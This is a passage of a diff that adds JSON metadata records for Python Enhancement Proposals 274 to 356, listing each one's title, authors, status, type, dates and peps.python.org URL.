"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0274/" + }, + "275": { + "number": 275, + "title": "Switching on Multiple Values", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Nov-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0275/" + }, + "276": { + "number": 276, + "title": "Simple Iterator for ints", + "authors": "Jim Althoff", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2001", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0276/" + }, + "277": { + "number": 277, + "title": "Unicode file name support for Windows NT", + "authors": "Neil Hodgson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0277/" + }, + "278": { + "number": 278, + "title": "Universal Newline Support", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0278/" + }, + "279": { + 
"number": 279, + "title": "The enumerate() built-in function", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0279/" + }, + "280": { + "number": 280, + "title": "Optimizing access to globals", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0280/" + }, + "281": { + "number": 281, + "title": "Loop Counter Iteration with range and xrange", + "authors": "Magnus Lie Hetland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0281/" + }, + "282": { + "number": 282, + "title": "A Logging System", + "authors": "Vinay Sajip, Trent Mick", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Feb-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0282/" + }, + "283": { + "number": 283, + "title": "Python 2.3 Release Schedule", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Feb-2002", + "python_version": "2.3", + "post_history": "27-Feb-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0283/" + }, + "284": { + "number": 284, + "title": "Integer for-loops", + "authors": "David Eppstein, Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0284/" + }, + "285": { + "number": 285, + "title": "Adding a bool type", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2002", + "python_version": "2.3", + "post_history": "08-Mar-2002, 30-Mar-2002, 03-Apr-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0285/" + }, + "286": { + "number": 286, + "title": "Enhanced Argument Tuples", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "03-Mar-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0286/" + }, + "287": { + "number": 287, + "title": "reStructuredText Docstring Format", + "authors": "David Goodger", + "discussions_to": "doc-sig@python.org", + "status": "Active", + "type": "Informational", + "topic": 
"", + "created": "25-Mar-2002", + "python_version": null, + "post_history": "02-Apr-2002", + "resolution": null, + "requires": null, + "replaces": "216", + "superseded_by": null, + "url": "https://peps.python.org/pep-0287/" + }, + "288": { + "number": 288, + "title": "Generators Attributes and Exceptions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "21-Mar-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0288/" + }, + "289": { + "number": 289, + "title": "Generator Expressions", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jan-2002", + "python_version": "2.4", + "post_history": "22-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0289/" + }, + "290": { + "number": 290, + "title": "Code Migration and Modernization", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0290/" + }, + "291": { + "number": 291, + "title": "Backward Compatibility for the Python 2 Standard Library", + "authors": "Neal Norwitz", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "06-Jun-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "387", + "url": "https://peps.python.org/pep-0291/" + }, + "292": { + "number": 292, + "title": "Simpler String Substitutions", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.4", + "post_history": "18-Jun-2002, 23-Mar-2004, 22-Aug-2004", + "resolution": null, + "requires": null, + "replaces": "215", + "superseded_by": null, + "url": "https://peps.python.org/pep-0292/" + }, + "293": { + "number": 293, + "title": "Codec Error Handling Callbacks", + "authors": "Walter D\u00f6rwald", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jun-2002", + "python_version": "2.3", + "post_history": "19-Jun-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0293/" + }, + "294": { + "number": 294, + "title": "Type Names in the types Module", + "authors": "Oren Tirosh", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2002", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0294/" + }, + "295": { + "number": 295, + "title": "Interpretation of multiline string constants", + "authors": "Stepan Koltsov", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Jul-2002", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0295/" + }, + "296": { + "number": 296, + "title": "Adding a bytes Object Type", + "authors": "Scott Gilbert", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "12-Jul-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0296/" + }, + "297": { + "number": 297, + "title": "Support for System Upgrades", + "authors": "Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2001", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0297/" + }, + "298": { + "number": 298, + "title": "The Locked Buffer Interface", + "authors": "Thomas Heller", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Jul-2002", + "python_version": "2.3", + "post_history": "30-Jul-2002, 01-Aug-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0298/" + }, + "299": { + "number": 299, + "title": "Special __main__() function in modules", + "authors": "Jeff Epler", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "12-Aug-2002", + "python_version": "2.3", + "post_history": "29-Mar-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0299/" + }, + "301": { + "number": 301, + "title": "Package Index and Metadata for Distutils", + "authors": "Richard Jones", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2002", + "python_version": "2.3", + "post_history": "08-Nov-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0301/" + }, + "302": { + "number": 302, + "title": "New Import Hooks", + "authors": "Just van Rossum, Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2002", + "python_version": "2.3", + "post_history": "19-Dec-2002", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0302/" + }, + "303": { + "number": 303, + "title": "Extend divmod() for Multiple Divisors", + "authors": "Thomas Bellman", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "31-Dec-2002", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0303/" + }, + "304": { + "number": 304, + "title": "Controlling Generation of Bytecode Files", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "22-Jan-2003", + "python_version": null, + "post_history": "27-Jan-2003, 31-Jan-2003, 17-Jun-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0304/" + }, + "305": { + "number": 305, + "title": "CSV File API", 
+ "authors": "Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells", + "discussions_to": "csv@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2003", + "python_version": "2.3", + "post_history": "31-Jan-2003, 13-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0305/" + }, + "306": { + "number": 306, + "title": "How to Change Python's Grammar", + "authors": "Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "29-Jan-2003", + "python_version": null, + "post_history": "30-Jan-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0306/" + }, + "307": { + "number": 307, + "title": "Extensions to the pickle protocol", + "authors": "Guido van Rossum, Tim Peters", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "31-Jan-2003", + "python_version": "2.3", + "post_history": "07-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0307/" + }, + "308": { + "number": 308, + "title": "Conditional Expressions", + "authors": "Guido van Rossum, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Feb-2003", + "python_version": "2.5", + "post_history": "07-Feb-2003, 11-Feb-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0308/" + }, + "309": { + "number": 309, + "title": "Partial Function Application", + "authors": "Peter Harris", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2003", + "python_version": "2.5", + "post_history": "10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0309/" + }, + "310": { + "number": 310, + "title": "Reliable Acquisition/Release Pairs", + "authors": "Michael Hudson, Paul Moore", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2002", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0310/" + }, + "311": { + "number": 311, + "title": "Simplified Global Interpreter Lock Acquisition for Extensions", + "authors": "Mark Hammond", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Feb-2003", + "python_version": "2.3", + "post_history": "05-Feb-2003, 14-Feb-2003, 19-Apr-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0311/" + }, + "312": { + "number": 312, + "title": "Simple Implicit Lambda", + "authors": "Roman Suzi, Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "11-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0312/" 
+ }, + "313": { + "number": 313, + "title": "Adding Roman Numeral Literals to Python", + "authors": "Mike Meyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0313/" + }, + "314": { + "number": 314, + "title": "Metadata for Python Software Packages 1.1", + "authors": "A.M. Kuchling, Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Apr-2003", + "python_version": "2.5", + "post_history": "29-Apr-2003", + "resolution": null, + "requires": null, + "replaces": "241", + "superseded_by": "345", + "url": "https://peps.python.org/pep-0314/" + }, + "315": { + "number": 315, + "title": "Enhanced While Loop", + "authors": "Raymond Hettinger, W Isaac Carroll", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Apr-2003", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0315/" + }, + "316": { + "number": 316, + "title": "Programming by Contract for Python", + "authors": "Terence Way", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-May-2003", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0316/" + }, + "317": { + "number": 317, + "title": "Eliminate Implicit Exception Instantiation", + "authors": "Steven Taschuk", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "06-May-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0317/" + }, + "318": { + "number": 318, + "title": "Decorators for Functions and Methods", + "authors": "Kevin D. Smith, Jim J. 
Jewett, Skip Montanaro, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2003", + "python_version": "2.4", + "post_history": "09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, 02-Sep-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0318/" + }, + "319": { + "number": 319, + "title": "Python Synchronize/Asynchronize Block", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0319/" + }, + "320": { + "number": 320, + "title": "Python 2.4 Release Schedule", + "authors": "Barry Warsaw, Raymond Hettinger, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jul-2003", + "python_version": "2.4", + "post_history": "01-Dec-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0320/" + }, + "321": { + "number": 321, + "title": "Date/Time Parsing and Formatting", + "authors": "A.M. Kuchling", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "16-Sep-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0321/" + }, + "322": { + "number": 322, + "title": "Reverse Iteration", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2003", + "python_version": "2.4", + "post_history": "24-Sep-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0322/" + }, + "323": { + "number": 323, + "title": "Copyable Iterators", + "authors": "Alex Martelli", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2003", + "python_version": "2.5", + "post_history": "29-Oct-2003", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0323/" + }, + "324": { + "number": 324, + "title": "subprocess - New process module", + "authors": "Peter Astrand", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0324/" + }, + "325": { + "number": 325, + "title": "Resource-Release Support for Generators", + "authors": "Samuele Pedroni", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2003", + "python_version": "2.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0325/" + }, + "326": { + "number": 326, + "title": "A Case for Top and Bottom Values", + "authors": "Josiah Carlson, Terry Reedy", + "discussions_to": null, + "status": "Rejected", + "type": 
"Standards Track", + "topic": "", + "created": "20-Dec-2003", + "python_version": "2.4", + "post_history": "20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, 21-Feb-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0326/" + }, + "327": { + "number": 327, + "title": "Decimal Data Type", + "authors": "Facundo Batista", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2003", + "python_version": "2.4", + "post_history": "30-Nov-2003, 02-Jan-2004, 29-Jan-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0327/" + }, + "328": { + "number": 328, + "title": "Imports: Multi-Line and Absolute/Relative", + "authors": "Aahz", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Dec-2003", + "python_version": "2.4, 2.5, 2.6", + "post_history": "08-Mar-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0328/" + }, + "329": { + "number": 329, + "title": "Treating Builtins as Constants in the Standard Library", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2004", + "python_version": "2.4", + "post_history": "18-Apr-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0329/" + }, + "330": { + "number": 330, + "title": "Python Bytecode Verification", + "authors": "Michel Pelletier", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "17-Jun-2004", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0330/" + }, + "331": { + "number": 331, + "title": "Locale-Independent Float/String Conversions", + "authors": "Christian R. Reis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jul-2003", + "python_version": "2.4", + "post_history": "21-Jul-2003, 13-Aug-2003, 18-Jun-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0331/" + }, + "332": { + "number": 332, + "title": "Byte vectors and String/Unicode Unification", + "authors": "Skip Montanaro", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2004", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0332/" + }, + "333": { + "number": 333, + "title": "Python Web Server Gateway Interface v1.0", + "authors": "Phillip J. Eby", + "discussions_to": "web-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "07-Dec-2003", + "python_version": null, + "post_history": "07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "3333", + "url": "https://peps.python.org/pep-0333/" + }, + "334": { + "number": 334, + "title": "Simple Coroutines via SuspendIteration", + "authors": "Clark C. 
Evans", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2004", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0334/" + }, + "335": { + "number": 335, + "title": "Overloadable Boolean Operators", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Aug-2004", + "python_version": "3.3", + "post_history": "05-Sep-2004, 30-Sep-2011, 25-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0335/" + }, + "336": { + "number": 336, + "title": "Make None Callable", + "authors": "Andrew McClelland", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Oct-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0336/" + }, + "337": { + "number": 337, + "title": "Logging Usage in the Standard Library", + "authors": "Michael P. Dubner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2004", + "python_version": "2.5", + "post_history": "10-Nov-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0337/" + }, + "338": { + "number": 338, + "title": "Executing modules as scripts", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2004", + "python_version": "2.5", + "post_history": "08-Nov-2004, 11-Feb-2006, 12-Feb-2006, 18-Feb-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0338/" + }, + "339": { + "number": 339, + "title": "Design of the CPython Compiler", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "02-Feb-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0339/" + }, + "340": { + "number": 340, + "title": "Anonymous Block Statements", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0340/" + }, + "341": { + "number": 341, + "title": "Unifying try-except and try-finally", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0341/" + }, + "342": { + "number": 342, + "title": "Coroutines via Enhanced Generators", + "authors": "Guido van Rossum, Phillip J. 
Eby", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0342/" + }, + "343": { + "number": 343, + "title": "The \"with\" Statement", + "authors": "Guido van Rossum, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-May-2005", + "python_version": "2.5", + "post_history": "02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, 30-Jul-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0343/" + }, + "344": { + "number": 344, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0344/" + }, + "345": { + "number": 345, + "title": "Metadata for Python Software Packages 1.2", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "28-Apr-2005", + "python_version": "2.7", + "post_history": "`22-Dec-2009 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/MKHXVV746H7ZDFN62Z72VNAX6KIRXNRO/", + "requires": null, + "replaces": "314", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0345/" + }, + "346": { + "number": 346, + "title": "User Defined (\"``with``\") Statements", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-May-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0346/" + }, + "347": { + "number": 347, + "title": "Migrating the Python CVS to Subversion", + "authors": "Martin von L\u00f6wis", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "14-Jul-2004", + "python_version": null, + "post_history": "14-Jul-2004", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0347/" + }, + "348": { + "number": 348, + "title": "Exception Reorganization for Python 3.0", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0348/" + }, + "349": { + "number": 349, + "title": "Allow str() to return unicode strings", + "authors": "Neil Schemenauer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2005", + "python_version": "2.5", + "post_history": "06-Aug-2005", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/M2Y3PUFLAE23NPRJPVBYF6P5LW5LVN6F/", + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0349/" + }, + "350": { + "number": 350, + "title": "Codetags", + "authors": "Micah Elliott", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "27-Jun-2005", + "python_version": null, + "post_history": "10-Aug-2005, 26-Sep-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0350/" + }, + "351": { + "number": 351, + "title": "The freeze protocol", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Apr-2005", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0351/" + }, + "352": { + "number": 352, + "title": "Required Superclass for Exceptions", + "authors": "Brett Cannon, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0352/" + }, + "353": { + "number": 353, + "title": "Using ssize_t as the index type", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Dec-2005", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0353/" + }, + "354": { + "number": 354, + "title": "Enumerations in Python", + "authors": "Ben Finney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2005", + "python_version": "2.6", + "post_history": "20-Dec-2005", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "435", + "url": "https://peps.python.org/pep-0354/" + }, + "355": { + "number": 355, + "title": "Path - Object oriented filesystem paths", + "authors": "Bj\u00f6rn Lindqvist", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0355/" + }, + "356": { + "number": 356, + "title": "Python 2.5 Release Schedule", + "authors": "Neal Norwitz, Guido van 